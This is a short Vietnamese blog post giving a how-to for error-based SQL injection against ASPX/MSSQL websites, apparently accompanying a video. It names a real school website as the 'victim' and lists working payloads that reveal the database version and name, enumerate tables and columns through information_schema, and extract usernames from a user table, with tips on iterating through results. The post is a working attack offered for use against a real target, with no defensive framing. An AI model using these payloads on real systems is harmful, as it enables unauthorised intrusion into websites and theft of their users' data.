- Phần mền bổ trợ : HACK BAR : ta vào Mozilla Firefox tải về nhá .. ▼
- Đây là những câu lệnh để các bạn tham khổ qua video .chúng ta có thể áp dụng nó để khai thác 1 cách dể dàng hơn :
victim http://thptnguyenthaibinh.edu.vn
' and 1=convert(int,@@version))-- - (version)
'and 1=convert(int,db_name()))-- - (database)
' and 1=convert(int,(select top 1 table_name from information_schema.tables)))-- -
ta thêm where table_name not in('table vừa tìm được') sau chử tables.. để tiềm thêm các table(table bên cạnh)
(lưu ý) nếu như chưa có table chúng ta cần thì tiếp tục theo vào và nhớ thêm dấu , khi khai thác các table tiếp theo
-- nhìn kỷ đoạn này nhá ..vì rất là dể quên à--
'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('table cần khai thác'))))-- -
vd như nảy ta ckeck dc tbuser thì thêm vào đó là ('tbuser')
nếu ta mún khai thác cloum cạnh bên thì thêm and column_name not in ('cái mới vừa được khai thác'))))-- -
giờ tìm user nhá 'and 1=convert(int,(select top 1 ten from tbuser)))-- -
-- nhớ kỷ (ten) và (user) nha.. ghi theo cái mà ta khai thác được
------------------------CHÚC CÁC BẠN THÀNH CÔNG---------------------
ĐĂNG KÝ
[Hướng Dẫn] Khai Thác Lổi SQL Dạng ASPX
4/
5
Oleh
Unknown